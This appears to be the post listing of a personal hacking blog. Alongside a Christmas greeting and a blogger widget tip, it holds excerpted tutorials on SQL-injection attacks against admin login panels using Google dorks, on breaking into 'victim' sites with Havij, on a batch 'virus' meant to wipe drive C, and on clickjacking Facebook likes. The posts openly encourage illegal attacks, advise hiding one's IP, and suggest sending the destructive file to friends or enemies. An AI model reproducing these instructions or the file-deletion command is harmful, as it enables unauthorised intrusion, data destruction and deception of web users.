Posts

Merry Christmas 2014

Image
Hey there blogger! Its Christmas! the most awaited time of the year, specially for us pinoys. From the country which Christians is the majority of the population. :D Well Christmas is not just about the food, party and beer. Let us all remember real meaning of Christmas is remembering the selfless love of Jesus,  So lets enjoy Christmas by living the life  what Jesus wants. A life full of love not just for our selves but also for others: Merry Christmas All :D Best Regards byruz..

HOW: Rocket to Top - Blogger

Image
      Good day blogger :D   I just want to share a cool add on to your blogger page, Turn you old fashion “ back to top arrow” to a cool and stylish with cool effect rocket to TOP add on. Same as the one that you can find at my blog.   First go to blogger.com and to your blog where you want to add the add on. Then go TEMPLATE and click EDIT HTML, now CTRL + F and search for . Just before or above the tag copy and paste the code below.       If you have problems, please comment below and ill try my best to answer all your questions:D   Happy blogging :D

HOW: Hacking Admin Panel Using SQL Injection

Image
Good Day Blogger! Today we will hack Admin Panel for website's that are vulnerable to SQL injection. For those who are new to Hacking Websites SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. So lets start hacking! NOTE: Website hacking is illegal so hide your IP addresse or use proxy servers.  First we search for a possible vulnerable site, we use google dorks to search for it.  So you just try pasting one of the code below and hit search. GOOGLE DORKS: inurl:adminlogin.aspx inurl:admin/index.php inurl:administrator.php inurl:administrator.asp inurl:login.asp inurl:login.aspx inurl:login.php inurl:admin/index.php inurl:adminlogin.aspx After we select any website. Then we will be directed to the Admin Log in page. So in the username and password field we insert the SQL injection queries.  EXAMPLE:     ...

How: Hack Websites Using Havij

Image
Hey blogger, Stormy weather here in the Philippines. Due to tropical storm Hagupit or locally named Ruby. But today we will not be talking about literal storms but how we can possibly be a dangerous storm to the web. here is a powerful tool for injecting sql to a website. I'm talking about Havij. you can download Havij on the link below. First we need to find a vulnerable webpage/s we can use this google dorks to find this pages. Below is a list of google doeks you can use to search for possible vulnerable webpages. Link: http://www.cometohack.com/2014/05/5000-fresh-google-dorks-list-for-sql_7713.html After we have chosen a victim page we now try to test if it is vulnerable to SQL injection. we put a single quote ( ' ) to the end of the pages url. like the example below ex. http://www.victim.com/accinfo.php?cartId=2 ' <= here we add the single quote. If errors are shown in the page like sql error or something changes in the webpage then the page is vulner...

HOW: Batch Virus (Simple)

Image
Hey blogger!         Today we will be making a VIRUS!. This time we will make a simple batch file that totally reformat your Drive C. Well it is where commonly we install our operating system. So good bye computer hehehe. Just follow the simple steps below. Note: Don't try executing the code on your own PC, maybe to a friends computer hehehehe.. STEP 1: We open Note Pad. STEP 2: Copy and paste this code:   @Echo off  Del C:\ *.* |y  STEP 3: Save it as Filename.bat. And WALAH! your done. you may now try sending this code to a enemy or a friend. Good luck :D NOTE: I am not responsible for any damage, Its your choice. I only suggest hehehe :D - byruz

HOW: Click Jacking For Likes (FB)

Image
Hey blogger!      Have you ever experience being trick for clicking something that leads you to like a certain facebook page? Maybe yes.. Click jacking is very popular today increase facebook fan page traffic. today i will show you how to make a click jacking page. STEP 1: We create the main page for our click jacking. Save it as  .HTML file  . STEP 2: We add the j query script below on the head part of you HTML. Click Here: http://pastebin.com/c7hzqknr STEP 3: Now we add the second code, - This code will make the like button follow your mouse, anywhere in the page. So when the user click anywhere from the page it generates the like. Click Here: http://pastebin.com/Npk3QjUH NOTE:  Dont forget to change   Replace Your facebook fanpageurl Whit your own fan page url . STEP 4:  SAVE, and upload your page to any free hosting page, Note:  this code is also applicable to blogger. Just go to Layout - Edit html...

HOW: Suggest Friends To Themselves (FB)

Image
Hey Blogger! It's been a while since I posted in my blog :) I have been busy for the last few months or year hahaha, But today I will teach you how to suggest friends to themselves in facebook. This is an old trick but really effective prank for your friends. NOTE: This trick will not hack your friends facebook account! Step 1:  We go to this link. And we change USERNAME to our victims user name - https://graph.facebook.com/ USERNAME So in my case it's byruzhacker, So we replace the USERNAME part of the link. ex: https://graph.facebook.com/ byruzhacker - Now we go to the link that we have created, and user information will be shown. Note: Take note of the id! in this case its 100000002855346. We will be needing that later. STEP 2: Now we will go to victims page, And suggest friends. - After hitting suggest friends a list of your friends will be shown. STEP 3: Now the geeky part, We now right click on anywhere  and select Ins...